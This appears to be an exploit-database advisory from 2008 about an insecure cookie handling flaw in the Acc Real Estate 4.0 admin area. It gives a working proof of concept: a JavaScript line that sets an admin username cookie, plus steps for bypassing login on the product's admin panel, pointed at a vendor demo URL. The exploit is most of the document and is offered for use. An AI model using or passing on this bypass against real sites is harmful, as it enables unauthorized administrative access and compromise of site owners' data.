id: 4042
date: 11/03/2008
title: Acc Real Estate 4.0 Insecure Cookie Handling Vulnerability
author: Hakxer
cves: 

==========================================================
Acc Real Estate 4.0 Insecure Cookie Handling Vulnerability
==========================================================


# [~] Discovered by : Hakxer
# [~] Type Gap : Acc Real Estate v4.0 Insecure Cookie Handling
# [~] Script : http://www.accscripts.com/realestate/admin-area-specifications.html
# [~] Greetz : Allah .. " Allah AkBar .. " Big Hacking SoOoN
##########################################################################

Bug In : /admin/Index.php
   
   PoC : javascript:document.cookie="username_cookie=admin";
   
   [~] Admin panel 
   http://www.accscripts.com/realestate/demo/admin/index.php
   [~] Execute JS Code javascript:document.cookie="username_cookie=admin"; 
   [~] Refresh
		

#  Proud To be a Muslim #
#_=END=_#



#  0day.today [2023-03-21]  #